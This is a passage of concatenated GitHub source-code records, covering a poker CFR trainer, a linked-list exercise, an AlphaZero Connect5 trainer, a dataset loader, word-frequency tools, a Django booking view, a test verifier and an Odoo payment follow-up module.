self.strategy[currentPlayer][infohash] = np.array([0.2, 0.2, 0.2, 0.2, 0.2])\n\n self.strategySum[currentPlayer][infohash] += self.strategy[currentPlayer][infohash]\n\n return self.strategy\n \n def copyGame(self, game):\n '''Copies an instance of the game object'''\n\n gameCopy = bloodRiver()\n attributes = vars(game)\n eval7Copy = lambda lst: 
[eval7.Card(str(card)) for card in lst]\n\n #hard coding since I can't find a way to reference the attributes iteratively\n gameCopy.deck = eval7Copy(game.deck)\n gameCopy.history = list(game.history)\n gameCopy.stack = np.copy(game.stack)\n gameCopy.currentPlayer = game.currentPlayer\n gameCopy.dealer = game.dealer\n gameCopy.winner = game.winner\n gameCopy.isTerminal = game.isTerminal\n gameCopy.cards = [eval7Copy(game.cards[0]), eval7Copy(game.cards[1])]\n gameCopy.board = eval7Copy(game.board)\n gameCopy.street = game.street\n gameCopy.firstMove = game.firstMove\n\n return gameCopy\n\n\n def lcfr(self, game, probabilities):\n '''Linear Counterfactual Regret Minimization\n probabilities is a vector of probabilities that the ith player will reach the current node\n '''\n\n #base case\n if game.isTerminal:\n return game.getPayout()\n \n #we should consider the chance node case if performance is unsatisfactory\n #note that chance node outcomes can be precomputed\n infoset = game.infoSet()\n infohash = hash(infoset)\n actions = game.getActions()\n player = infoset['player']\n\n #create the node if it doesn't exist\n if infohash not in self.strategySum.get(player, {}):\n self.strategySum[player][infohash] = np.zeros(5)\n self.regretSum[player][infohash] = np.zeros(5)\n self.strategy[player][infohash] = np.zeros(5)\n\n #get the strategy for the current player\n strategy = self.getStrategy(infohash, player)\n actionUtilities = np.zeros((5, 2)) #one utility pair (both players) per action\n nodeUtilities = np.zeros(2)\n \n #for each action, recursively call lcfr\n for action in actions:\n gameCopy = self.copyGame(game)\n actIndx = self.actionIndex[action]\n print(gameCopy.infoSet())\n gameCopy.makeMove(action)\n print(gameCopy.infoSet(), '\\n')\n probabilityCopy = np.copy(probabilities)\n probabilityCopy[player] *= strategy[player][infohash][actIndx]\n actionUtilities[actIndx] = self.lcfr(gameCopy, probabilityCopy)\n\n for playerIndex in range(2):\n nodeUtilities[playerIndex] += actionUtilities[actIndx][playerIndex] * strategy[player][infohash][actIndx]\n\n #counterfactual reach probability: the product of the opponents' reach probabilities\n counterfacProb = 1\n for p in range(2):\n if p != player: counterfacProb *= probabilities[p]\n\n #update the regrets and the average strategy for every legal action\n for action in actions:\n actIndx = self.actionIndex[action]\n regret = actionUtilities[actIndx][player] - nodeUtilities[player]\n self.regretSum[player][infohash][actIndx] += counterfacProb * regret\n self.strategySum[player][infohash][actIndx] += counterfacProb * strategy[player][infohash][actIndx]\n\n return nodeUtilities\n\n\n def train(self, iterations):\n '''Trains the CFR algorithm for the given number of iterations'''\n\n for i in range(iterations):\n game = bloodRiver()\n game.beginGame(i%2)\n self.lcfr(game, np.array([1.0, 1.0])) #float reach probabilities so in-place multiplication works\n\n #compute the average strategy\n for player in range(2):\n for infoset in self.strategySum[player]:\n normalizingSum = 0\n for i in range(len(self.strategySum[player][infoset])):\n normalizingSum += self.strategySum[player][infoset][i]\n for i in range(len(self.strategySum[player][infoset])):\n if normalizingSum > 0:\n self.strategySum[player][infoset][i] /= normalizingSum\n else:\n self.strategySum[player][infoset][i] = 1/len(self.strategySum[player][infoset])\n\n return self.strategySum\n\n\nif __name__ == '__main__':\n trainer = bloodyStream()\n trainer.train(1)","repo_name":"ppxscal/Python-CFR-Implementation","sub_path":"cfr/cfr.py","file_name":"cfr.py","file_ext":"py","file_size_in_byte":5576,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} 
+{"seq_id":"40143493046","text":"class Node(object):\r\n\r\n def __init__(self, value, node=None):\r\n self.value = value\r\n self.next = node\r\n \r\n\r\n def __str__(self):\r\n return repr(self)\r\n\r\n\r\n def __repr__(self):\r\n return \"%s->%s\" % (self.value, self.next.value)\r\n\r\nclass LinkTableUnderflow(ValueError):\r\n pass\r\n\r\n\r\nclass LinkTable(object):\r\n\r\n def __init__(self, values='', head=None):\r\n self.head = head\r\n if not values:\r\n return\r\n if isinstance(values, dict):\r\n values = values.items()\r\n values = list(values)\r\n values.reverse()\r\n for value in values:\r\n node = Node(value)\r\n node.next = self.head\r\n self.head = node\r\n\r\n def __len__(self):\r\n temp = self.head\r\n count = 0\r\n while temp is not None:\r\n count +=1\r\n temp = temp.next\r\n return count\r\n\r\n def is_empty(self):\r\n if self.head is None:\r\n return True\r\n return False\r\n \r\n def prepend(self, value):\r\n node = Node(value, self.head)\r\n self.head = node\r\n\r\n def pop(self):\r\n if self.head is None:\r\n raise LinkTableUnderflow(\"in pop\")\r\n node = self.head\r\n self.head = self.head.next\r\n return node\r\n\r\n def append(self, value):\r\n node = Node(value)\r\n if self.head is None:\r\n self.head = node\r\n return\r\n temp = self.head\r\n while temp.next is not None:\r\n temp = temp.next\r\n temp.next = node\r\n\r\n def pop_last(self):\r\n if self.is_empty():\r\n raise LinkTableUnderflow(\"in pop_last\")\r\n temp = self.head\r\n if temp.next is None:\r\n value = None\r\n self.head = None\r\n return value\r\n while temp.next.next is not None:\r\n temp = temp.next\r\n value = temp.next.value\r\n temp.next = None\r\n return value\r\n\r\n\r\n def __str__(self):\r\n if self.head is None:\r\n return []\r\n List = []\r\n temp = self.head\r\n while temp:\r\n List.append(temp.value)\r\n temp = temp.next\r\n return str(List)\r\n\r\n\r\ndef delete_last_n_node(linktable, n):\r\n length = len(linktable)\r\n if length == 0:\r\n raise LinkTableUnderflow(\"linktable is empty\")\r\n if n <= 0: \r\n raise ValueError(\"n must larger than 0\")\r\n if length < n:\r\n raise LinkTableUnderflow(\"out of index\")\r\n forward_index = length - n\r\n temp = linktable.head\r\n count = 0\r\n while temp.next is not None:\r\n count +=1\r\n if count == forward_index:\r\n break\r\n temp = temp.next\r\n node = temp.next\r\n temp.next = temp.next.next\r\n return node\r\n\r\ndef new_delete_last_n_node(linktable, n):\r\n fast = linktable.head\r\n while n > 0:\r\n fast = fast.next\r\n n -= 1\r\n if fast is None:\r\n return linktable.head.next\r\n slow = linktable.head\r\n while fast.next is not None:\r\n fast = fast.next\r\n slow = slow.next\r\n slow.next = slow.next.next\r\n return linktable.head\r\n\r\nif __name__ == \"__main__\":\r\n # link_table = LinkTable([2,1,4,5,7,9,6])\r\n # print(link_table)\r\n # print(delete_last_n_node(link_table, 3))\r\n # print(link_table)\r\n\r\n\r\n link_table = LinkTable([2,1,4])\r\n print(link_table)\r\n print(LinkTable(head=new_delete_last_n_node(link_table, 3)))\r\n\r\n","repo_name":"GuilongMa/python-Data-Structures-and-Algorithmic-Programs","sub_path":"链表/删除链表倒数的第n个结点.py","file_name":"删除链表倒数的第n个结点.py","file_ext":"py","file_size_in_byte":3432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43075993722","text":"import multiprocessing as mp\nimport os\nimport time\n\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nfrom tensorboardX import SummaryWriter\nfrom torch import 
optim\n\nfrom alphazero import preprocess\nfrom alphazero.mcts import AZAgent\nfrom alphazero.network import Network\nfrom alphazero.replaybuffer import ReplayBuffer\nfrom connect5 import agent\nfrom connect5 import board as connect5_board\nfrom connect5 import types\n\nUSE_CUDA = torch.cuda.is_available()\n\n# Dictionary that stores the training configuration values\nTRAINING_CONFIG = {\n 'BOARD_SIZE': 7,\n\n 'LEARNING_RATE': 1e-2,\n 'WEIGHT_DECAY': 1e-4,\n\n 'ROUNDS_PER_MOVE': 800,\n 'PUCT': 1.25,\n 'PUCT_INIT': 1.25,\n 'PUCT_BASE': 19652,\n\n 'MCTS_NOISE': True,\n 'MCTS_ALPHA': 0.03,\n 'MCTS_EPS': 0.25,\n\n 'SELFPLAY_WORKERS': 12,\n 'START_TRAINING': 1280,\n 'EPOCH': 1,\n 'BATCH_SIZE': 128,\n 'CAPACITY': 10000,\n\n 'LOAD_CHECKPOINT': 0\n}\n\nbuffer = ReplayBuffer(TRAINING_CONFIG['CAPACITY'])\n\ntarget_network = Network(TRAINING_CONFIG['BOARD_SIZE'])\n\nif USE_CUDA:\n target_network = target_network.cuda()\n\nif TRAINING_CONFIG['LOAD_CHECKPOINT'] != 0:\n target_network.load_state_dict(torch.load(f'models/checkpoint-{TRAINING_CONFIG[\"LOAD_CHECKPOINT\"]}.bin'))\n\n# Worker that plays self-play games\ndef selfplay_worker(queue):\n while True:\n game = connect5_board.GameState.new_game(TRAINING_CONFIG['BOARD_SIZE'])\n agent = AZAgent(TRAINING_CONFIG['BOARD_SIZE'], target_network.state_dict(), \\\n TRAINING_CONFIG['MCTS_NOISE'], TRAINING_CONFIG['MCTS_ALPHA'], TRAINING_CONFIG['MCTS_EPS'], \\\n TRAINING_CONFIG['ROUNDS_PER_MOVE'], TRAINING_CONFIG['PUCT_INIT'], TRAINING_CONFIG['PUCT_BASE'])\n\n while not game.is_over():\n move = agent.select_move(game, TRAINING_CONFIG['PUCT'])\n game = game.apply_move(move)\n\n queue.put((game.winner, agent.train_data))\n\n# Main function of the program\ndef main():\n step = TRAINING_CONFIG['LOAD_CHECKPOINT']\n num_game = 0\n\n manager = mp.Manager()\n queue = manager.Queue()\n\n writer = SummaryWriter()\n\n opt = optim.SGD(target_network.parameters(), lr=TRAINING_CONFIG['LEARNING_RATE'], weight_decay=TRAINING_CONFIG['WEIGHT_DECAY'], momentum=0.9)\n\n if not os.path.exists('models'):\n os.mkdir('models')\n\n # Part that creates the workers\n workers = []\n for _ in range(TRAINING_CONFIG['SELFPLAY_WORKERS']):\n p = mp.Process(target=selfplay_worker, args=(queue,))\n p.daemon = True\n p.start()\n\n workers.append(p)\n\n # Code that runs the training loop\n while True:\n try:\n winner, result = queue.get()\n buffer.push(winner, result)\n \n num_game += 1\n print(f'selfplay game #{num_game}')\n\n if len(buffer) < TRAINING_CONFIG['START_TRAINING']:\n continue\n\n step += 1\n print(f'start training #{step}')\n\n total_pi = 0\n total_v = 0\n total_loss = 0\n\n for _ in range(TRAINING_CONFIG['EPOCH']):\n states, pis, values = buffer.sample(TRAINING_CONFIG['BATCH_SIZE'])\n if USE_CUDA:\n states, pis, values = states.cuda(), pis.cuda(), values.cuda()\n\n opt.zero_grad()\n out_pi, out_v = target_network(states)\n out_pi = F.log_softmax(out_pi, dim=1)\n\n loss_pi = -(out_pi * pis).sum(dim=1).mean()\n loss_v = F.mse_loss(out_v, values)\n \n loss = loss_pi + loss_v\n loss.backward()\n opt.step()\n\n # accumulate over the epoch; the averages below divide by EPOCH\n total_pi += loss_pi.item()\n total_v += loss_v.item()\n total_loss += loss.item()\n\n buffer.clear_half()\n torch.save(target_network.state_dict(), f'models/checkpoint-{step}.bin')\n\n writer.add_scalar('train total loss', total_loss / TRAINING_CONFIG['EPOCH'], step)\n writer.add_scalar('train pi loss', total_pi / TRAINING_CONFIG['EPOCH'], step)\n writer.add_scalar('train value loss', total_v / TRAINING_CONFIG['EPOCH'], step)\n except KeyboardInterrupt:\n print('Stopping training...')\n\n for worker in workers:\n worker.terminate()\n break\n\n except Exception as e:\n print('Exception', e)\n 
continue\n\nif __name__ == '__main__':\n mp.set_start_method('spawn')\n main()\n","repo_name":"utilForever/2020-OSS-Winter-AlphaZero","sub_path":"2 - Examples/2 - Day 2/2 - AlphaZero/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4482,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"61"}
+{"seq_id":"71923491395","text":"import os \nimport sys \nimport torch.utils.data as data\nimport torch \nimport numpy as np \nfrom PIL import Image \n\nimport transformers\n\n\nfrom dataset.refer import REFER\n\n\n\n\nclass ReferDataset(data.Dataset):\n def __init__(self,\n args,\n image_transforms=None,\n max_tokens=20, \n split='train',\n eval_mode=False) -> None:\n \"\"\"\n parameters:\n args: argparse obj\n image_transforms: transforms applied to image and mask\n max_tokens: determines the max length of tokens \n split: ['train','val','testA','testB']\n eval_mode: whether in training or evaluating \n \"\"\"\n\n self.classes=[]\n self.image_transforms=image_transforms\n self.split=split\n self.refer=REFER(args.refer_data_root, args.dataset, args.splitBy)\n\n self.max_tokens=max_tokens\n\n ref_ids=self.refer.getRefIds(split=self.split)\n img_ids=self.refer.getImgIds(ref_ids)\n # change dict to list\n all_imgs=self.refer.Imgs\n self.imgs=list(all_imgs[i] for i in img_ids)\n \n self.ref_ids=ref_ids\n # input_ids -> token ids corresponding to the input sentence\n # attention_masks -> masks out the padded part\n self.input_ids=[]\n self.attention_masks=[]\n self.tokenizer=transformers.BertTokenizer.from_pretrained(args.bert_tokenizer)\n\n self.eval_mode=eval_mode\n # pad_id=[0]\n pad_id = self.tokenizer.convert_tokens_to_ids(self.tokenizer.tokenize('[PAD]'))\n\n for r in self.ref_ids:\n # for each image\n ref=self.refer.Refs[r]\n # List[Tensor] Tensor shape [1,len]\n sentences_for_ref=[]\n attentions_for_ref=[]\n # for each sentence\n for i,(el,sent_id) in enumerate(zip(ref['sentences'],ref['sent_ids'])):\n sentence_raw=el['raw']\n attention_mask = [0] * self.max_tokens\n padded_input_ids = [0] * self.max_tokens\n # special tokens are added via `add_special_tokens=True`\n input_ids = self.tokenizer.encode(text=sentence_raw, add_special_tokens=True)\n\n # truncation of tokens\n input_ids = input_ids[:self.max_tokens]\n\n padded_input_ids[:len(input_ids)] = input_ids\n attention_mask[:len(input_ids)] = [1]*len(input_ids)\n\n sentences_for_ref.append(torch.tensor(padded_input_ids).unsqueeze(0))\n attentions_for_ref.append(torch.tensor(attention_mask).unsqueeze(0))\n # List[List[Tensor]]\n self.input_ids.append(sentences_for_ref)\n self.attention_masks.append(attentions_for_ref)\n\n def get_classes(self):\n return self.classes\n \n def __len__(self):\n return len(self.ref_ids)\n \n def __getitem__(self,index):\n this_ref_id=self.ref_ids[index]\n this_img_id=self.refer.getImgIds(this_ref_id)\n this_img=self.refer.Imgs[this_img_id[0]]\n \n img=Image.open(os.path.join(self.refer.IMAGE_DIR,this_img['file_name'])).convert(\"RGB\")\n\n ref=self.refer.loadRefs(this_ref_id)\n this_sent_ids=ref[0]['sent_ids']\n\n ref_mask=np.array(self.refer.getMask(ref[0])['mask'])\n annot=np.zeros(ref_mask.shape)\n annot[ref_mask==1]=1\n # convert it to a Pillow image\n annot = Image.fromarray(annot.astype(np.uint8), mode=\"P\")\n\n if self.image_transforms is not None:\n # involves transform from PIL to tensor and mean and std normalization\n img, target = self.image_transforms(img, annot)\n else:\n target=annot\n \n if self.eval_mode:\n \"\"\"\n torch.Size([3, 384, 384]) torch.Size([384, 384]) torch.Size([1, 20, 3]) torch.Size([1, 
20, 3])\n \"\"\"\n embedding=[]\n att=[]\n\n for s in range(len(self.input_ids[index])):\n e=self.input_ids[index][s]\n a=self.attention_masks[index][s]\n\n embedding.append(e.unsqueeze(-1))\n att.append(a.unsqueeze(-1))\n # all sentence\n tensor_embeddings = torch.cat(embedding, dim=-1)\n attention_mask = torch.cat(att, dim=-1)\n \n else: # for training random select one sentence\n \"\"\"\n torch.Size([3, 384, 384]) torch.Size([384, 384]) torch.Size([1, 20]) torch.Size([1, 20])\n \"\"\"\n choice_sent=np.random.choice(len(self.input_ids[index]))\n tensor_embeddings = self.input_ids[index][choice_sent]\n attention_mask = self.attention_masks[index][choice_sent]\n \n return img,target,tensor_embeddings,attention_mask\n\n ","repo_name":"lifeGWT/LAVT-pytorch","sub_path":"dataset/ReferDataset.py","file_name":"ReferDataset.py","file_ext":"py","file_size_in_byte":4795,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"17512713967","text":"\"\"\"\n Count words from a list of .txt files\n\n Based on:\n\n https://github.com/explosion/spacy-dev-resources/blob/master/training/word_freqs.py\n\"\"\"\n\nfrom __future__ import unicode_literals, print_function\n\nimport plac\nimport io\nimport spacy\n\nfrom spacy.lang.nb import Norwegian\n\nfrom spacy.strings import StringStore\nfrom spacy.attrs import ORTH\nfrom spacy.tokenizer import Tokenizer\nfrom spacy.vocab import Vocab\nimport spacy.util\n\nfrom pathlib import Path\n\nfrom preshed.counter import PreshCounter\nfrom joblib import Parallel, delayed\nfrom pathlib import Path\nimport multiprocessing\n\nfrom tqdm import tqdm\n\n\ndef parallelize(func, iterator, n_jobs):\n Parallel(n_jobs=n_jobs)(delayed(func)(*item) for item in iterator)\n\n\ndef count_freqs(input_loc, output_loc):\n print(\"{} => {}\".format(input_loc, output_loc))\n\n tokenizer = Norwegian.Defaults.create_tokenizer()\n counts = PreshCounter()\n\n with open(input_loc, \"r\") as file:\n for line in file:\n doc = tokenizer(line.strip())\n doc.count_by(ORTH, counts=counts)\n\n with open(output_loc, \"w\", encoding=\"utf8\") as file_:\n for orth, freq in counts:\n string = tokenizer.vocab.strings[orth]\n if not string.isspace():\n file_.write(\"%d\\t%s\\n\" % (freq, string))\n\n\ndef merge_counts(locs, out_loc):\n string_map = StringStore()\n counts = PreshCounter()\n df_counts = PreshCounter()\n\n for loc in tqdm(locs):\n with io.open(loc, \"r\", encoding=\"utf8\") as file_:\n for line in file_:\n freq, word = line.strip().split(\"\\t\", 1)\n orth = string_map.add(word)\n counts.inc(orth, int(freq))\n df_counts.inc(orth, 1)\n\n with io.open(out_loc, \"w\", encoding=\"utf8\") as file_:\n for orth, freq in counts:\n word = string_map[orth]\n file_.write(\"{}\\t{}\\t{}\\n\".format(freq, df_counts[orth], repr(word)))\n\n\n@plac.annotations(\n input_dir=(\"Dir with .txt files to analyze\", \"positional\"),\n result_path=(\"File to write frequencies\", \"positional\"),\n skip_existing=(\"Skip file if it already exists\", \"option\", \"s\", bool),\n n_jobs=(\"Number of workers\", \"option\", \"n\", int),\n)\ndef main(\n input_dir, result_path, skip_existing=True, n_jobs=multiprocessing.cpu_count()\n):\n tasks = []\n outputs = []\n\n input_dir = Path(input_dir)\n\n for input_path in input_dir.rglob(\"*.txt\"):\n output_path = input_path.with_suffix(\".freq\")\n outputs.append(output_path)\n\n if not skip_existing or not output_path.exists():\n tasks.append((input_path, output_path))\n\n if tasks:\n parallelize(count_freqs, tasks, 
n_jobs)\n\n print(\"Merging result to {}\".format(result_path))\n merge_counts(outputs, result_path)\n\n\nif __name__ == \"__main__\":\n plac.call(main)\n","repo_name":"mladenzivo/spacy-nb","sub_path":"tools/word_freq.py","file_name":"word_freq.py","file_ext":"py","file_size_in_byte":2832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38550353926","text":"\"\"\"\nMust be run after main.py has been run so that `./out/observations.csv` exists.\n\"\"\"\n\nimport pandas as pd\nfrom typing import List, Tuple, Iterable\nimport re\n\n\ndef split_namespace_and_notation(locations: Iterable[str]) -> Iterable[Tuple[str, str]]:\n re_pattern = re.compile(\"^(.*/)(.*)$\")\n for location in locations:\n matches = re_pattern.match(location)\n namespace = matches.group(1)\n notation = matches.group(2)\n yield namespace, notation\n\n\ndef do_da_split():\n group_concept_base_uri = \"http://gss-data.org.uk/data/gss_data/trade/international-trade-in-services-by\" \\\n \"-subnational-areas-of-the-uk#concept-scheme/location\"\n nuts_group_notation = \"nuts\"\n stat_geog_group_notation = \"statistical-geographies\"\n nuts_group_uri = f\"{group_concept_base_uri}/{nuts_group_notation}\"\n stat_geog_group_uri = f\"{group_concept_base_uri}/{stat_geog_group_notation}\"\n\n group_codelist_values = pd.DataFrame({\n \"URI\": [nuts_group_uri, stat_geog_group_uri],\n \"Notation\": [nuts_group_notation, stat_geog_group_notation],\n \"Label\": [\"NUTS\", \"UK Government Statistical Geographies\"],\n \"Parent URI\": [None, None]\n })\n\n observations = pd.read_csv(\"./out/observations.csv\")\n unique_locations = observations.Location.unique()\n\n namespace_and_notations = list(split_namespace_and_notation(unique_locations))\n notations = [notation for namespace, notation in namespace_and_notations]\n\n parent_uri = [\n nuts_group_uri if namespace == \"http://data.europa.eu/nuts/code/\" else stat_geog_group_uri\n for namespace, _ in namespace_and_notations\n ]\n\n codelist = pd.DataFrame({\n \"URI\": unique_locations,\n \"Notation\": notations,\n \"Label\": [None for x in namespace_and_notations],\n \"Parent URI\": parent_uri\n })\n\n codelist = pd.concat([group_codelist_values, codelist], axis=0)\n\n codelist[\"Sort Priority\"] = range(0, len(codelist[\"URI\"]))\n codelist.to_csv(\"./codelists/location.csv\", index=False)\n\n\nif __name__ == \"__main__\":\n do_da_split()\n","repo_name":"GSS-Cogs/family-trade","sub_path":"datasets/ONS-International-trade-in-services-by-subnational-areas-of-the-UK/generate-locations-codelist.py","file_name":"generate-locations-codelist.py","file_ext":"py","file_size_in_byte":2097,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"12008939002","text":"from django.shortcuts import render,redirect\n\n\nfrom lifecare.models import Booking\n# Create your views here.\n\n'''def lifecare(request):\n return render(request,'index.html')'''\n\n\ndef booking(request):\n if request.method == 'GET':\n return render(request, 'index.html')\n else:\n name = request.POST.get('name')\n email = request.POST.get('email')\n day = request.POST.get('day')\n date = request.POST.get('date')\n doc = request.POST.get('doc')\n textarea_message = request.POST.get('textarea_message')\n Booking.objects.create(name=name, email=email,day=day,date=date,doc=doc,textarea_message=textarea_message)\n return 
redirect('lifecare:booking')\n\n\n","repo_name":"anondep73/batch1","sub_path":"lifecare/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5258755286","text":"import os, sys\nimport glob\nimport numpy as np\n\n\n############# Verifies the output of PAOFLOW #############\n## Usage:\n## \"python check_test.py [test_directory_pattern] [output_directory] [reference_directory]\"\n##\n## Default:\n## \"python check_test.py example* output Reference\"\n##\n##########################################################\n\ndef verifyData ( subdir, datPattern, refPattern ):\n\n ########## User Defined Variables ##########\n showFileResult = False # Show PASS or FAIL for each file\n showErrors = False # Flag to print out error values\n tolerance = 0.01 # Percentage that error can deviate from average to pass tests\n ######### End User Defined Variables ########\n\n print(('Verifying .dat files for %s' % subdir))\n\n # Get new data files and existing reference data files\n datFiles = glob.glob(datPattern+'/*.dat')\n refFiles = glob.glob(refPattern+'/*.dat')\n\n # Verify that .dat files exist in reference directory\n if len(refFiles) == 0:\n print('\\tReference directory is empty or does not exist.\\n')\n return\n\n # Sort the lists of files\n datFiles.sort()\n refFiles.sort()\n\n # Quick function to replace directory path\n rp = lambda f, p : [r.replace(p,'') for r in f]\n\n if len(datFiles) == 0:\n print('\\tNo output files found\\n')\n return\n\n # Ensure that the lists are identical\n if rp(datFiles, datFiles[0].split('/')[0]) != rp(refFiles, refFiles[0].split('/')[0]):\n print('\\tList of calculated .dat files does not match reference files.\\n')\n return\n\n # Compare data files\n maxError = -1. # Will store maximum error value\n maxErrorIndex = -1 # Will store file index of maximum error value\n maxRelError = -1. 
# Store maximum relative error\n maxRelErrorIndex = -1 # Store file index of maximum relative error value\n allDataResult = 'PASS' # Stores status of the entire example calculation\n for i in range(len(datFiles)):\n \n # Gather data from files\n df = open(datFiles[i], 'r')\n rf = open(refFiles[i], 'r')\n dl = np.array([[float(s) for s in l.split()] for l in df.readlines()]).transpose()\n rl = np.array([[float(s) for s in l.split()] for l in rf.readlines()]).transpose()\n df.close()\n rf.close()\n\n nCol = len(dl)\n nRow = len(dl[0])\n\n # Compute absolute error and data range excluding the first column\n absoluteError = np.sum(abs(abs(dl[1:nCol, :]) - abs(rl[1:nCol, :])), axis=1) / nRow\n dataRange = np.amax(np.amax(dl[1:nCol, :], axis=1), axis=0) - np.amin(np.amin(dl[1:nCol, :], axis=1), axis=0)\n relativeError = []\n\n # Compare computed error against data average\n validData = True\n for j in range(nCol-1):\n\n # Store maximum absolute error\n if absoluteError[j] > maxError:\n maxError = absoluteError[j]\n maxErrorIndex = i\n\n # Compute relative error\n relError = absoluteError[j]/dataRange\n relativeError.append(relError)\n\n # Store maximum relative error\n if relError > maxRelError:\n maxRelError = relError\n maxRelErrorIndex = i\n\n # Ensure that relative error is less than user defined tolerance\n if relError > tolerance:\n validData = False\n\n if np.isnan(absoluteError).any() or np.isnan(relativeError).any():\n validData = False\n\n if validData:\n result = 'PASS'\n else:\n allDataResult = result = 'FAIL'\n\n if showErrors:\n print(('\\t%s:\\n\\t\\tMean Absolute Errors: %s\\n\\t\\tRelative Errors: %s' % (datFiles[i], absoluteError, relativeError)))\n if showFileResult:\n print(('\\t%s ---------- [%s]\\n' % (datFiles[i], result)))\n\n if showErrors:\n print(('The maximum absolute error in %s was %E in %s' % (subdir, maxError, datFiles[maxErrorIndex])))\n print(('The maximum relative error in %s was %E in %s' % (subdir, maxRelError, datFiles[maxRelErrorIndex])))\n\n print(('%s ---------- [%s]\\n' % (subdir, allDataResult)))\n\n\ndef main():\n\n # Look for test directory pattern argument\n if len(sys.argv) > 1:\n alldir = sorted(glob.glob(sys.argv[1]))\n else:\n alldir = sorted(glob.glob('example*'))\n\n # Assign default reference directory pattern, then look for argument\n datPattern = 'output'\n if len(sys.argv) > 2:\n datPattern = sys.argv[2]\n\n # Assign default reference directory pattern, then look for argument\n refPattern = 'Reference'\n if len(sys.argv) > 3:\n refPattern = sys.argv[3]\n\n # Verify data for each test matching the input or default pattern\n for n in range(len(alldir)):\n os.chdir(alldir[n])\n subdir = str(os.getcwd()).split('/')[len(str(os.getcwd()).split('/'))-1]\n verifyData(subdir, datPattern, refPattern)\n os.chdir('../')\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"marcobn/PAOFLOW","sub_path":"examples/check_test.py","file_name":"check_test.py","file_ext":"py","file_size_in_byte":4985,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"19738411838","text":"from lxml import etree\nfrom flectra import api, fields, models, _\nfrom flectra.exceptions import UserError\nfrom flectra.tools.misc import formatLang\nfrom functools import reduce\n\nclass ResPartner(models.Model):\n _inherit = \"res.partner\"\n\n @api.multi\n def write(self, vals):\n if vals.get(\"user_id\", False):\n for partner in self:\n if partner.user_id != \\\n vals[\"user_id\"]:\n responsible_partner_id = 
self.env[\"res.users\"].browse(\n vals['user_id']).partner_id.id\n self.env[\"mail.thread\"].message_post(\n body=_(\"You became responsible to do the next \"\n \"action for the payment follow-up of\") +\n \" \" +\n partner.name + \" \",\n type='comment',\n subtype=\"mail.mt_comment\",\n model='res.partner', res_id=partner.id,\n partner_ids=[responsible_partner_id])\n return super(ResPartner, self).write(vals)\n\n @api.multi\n def _compute_latest_fup_details(self):\n company = False\n for partner in self:\n if not partner.company_id:\n company = self.env.user.company_id.id\n else:\n company = self.env['res.company'].browse(\n partner.company_id.id).id\n amls = partner.move_line_ids\n latest_date = latest_level = latest_days = False\n latest_level_without_lit = latest_days_without_lit = False\n for aml in amls:\n if (aml.company_id.id == company) and \\\n aml.payment_followup_line_id and \\\n (not latest_days or\n latest_days < aml.payment_followup_line_id.waiting_period):\n latest_days = aml.payment_followup_line_id.waiting_period\n latest_level = aml.payment_followup_line_id.id\n if (aml.company_id.id == company) and \\\n (not latest_date or (aml.date_payment_followup and\n latest_date < aml.date_payment_followup)):\n latest_date = aml.date_payment_followup\n if (aml.company_id.id == company) and \\\n (not aml.blocked) and \\\n (aml.payment_followup_line_id and\n (not latest_days_without_lit or\n latest_days_without_lit <\n aml.payment_followup_line_id.waiting_period)):\n latest_days_without_lit = \\\n aml.payment_followup_line_id.waiting_period\n latest_level_without_lit = aml.payment_followup_line_id.id\n partner.followup_date = latest_date\n partner.followup_line_id = latest_level\n partner.wo_legal_process_followup_line_id = \\\n latest_level_without_lit\n\n @api.multi\n def _compute_payment_rel_details(self):\n company = self.env.user.company_id\n current_date = fields.Date.today()\n for partner in self:\n worst_due_date = False\n amt_tobe_paid = overdue_amt = 0.0\n for aml in partner.move_line_ids:\n if (aml.company_id == company):\n date_maturity = aml.date_maturity or aml.date\n if not worst_due_date or date_maturity < worst_due_date:\n worst_due_date = date_maturity\n amt_tobe_paid += aml.amount_balance\n if (date_maturity <= current_date):\n overdue_amt += aml.amount_balance\n partner.amt_tobe_paid = amt_tobe_paid\n partner.overdue_amt = overdue_amt\n partner.expected_payment_date = worst_due_date\n\n @api.multi\n def _get_partner_manual_action(self, partner_ids):\n for partner in self.browse(partner_ids):\n action_text = \"\"\n f_level = partner.wo_legal_process_followup_line_id\n todo_activity = f_level.todo_activity\n if partner.upcoming_activity:\n action_text = (partner.upcoming_activity or ''\n ) + \"\\n\" + (todo_activity or '')\n else:\n action_text = todo_activity or ''\n action_date = \\\n partner.upcoming_activity_date or \\\n fields.Date.today()\n user_id = False\n if partner.user_id:\n user_id = partner.user_id.id\n else:\n p = f_level.user_id\n user_id = p and p.id or False\n partner.write({'upcoming_activity_date': action_date,\n 'upcoming_activity': action_text,\n 'user_id': user_id})\n\n @api.multi\n def _get_partner_fup_report_print(self, data):\n data['partner_ids'] = self.ids\n datas = {\n 'ids': self.ids,\n 'model': 'payment.followup',\n 'form': data\n }\n return self.env.ref(\n 'payment_followup.action_report_payment_followup').report_action(\n self, data=datas)\n\n @api.multi\n def print_overdue_payment(self):\n assert (len(self.ids) == 1)\n company_id = 
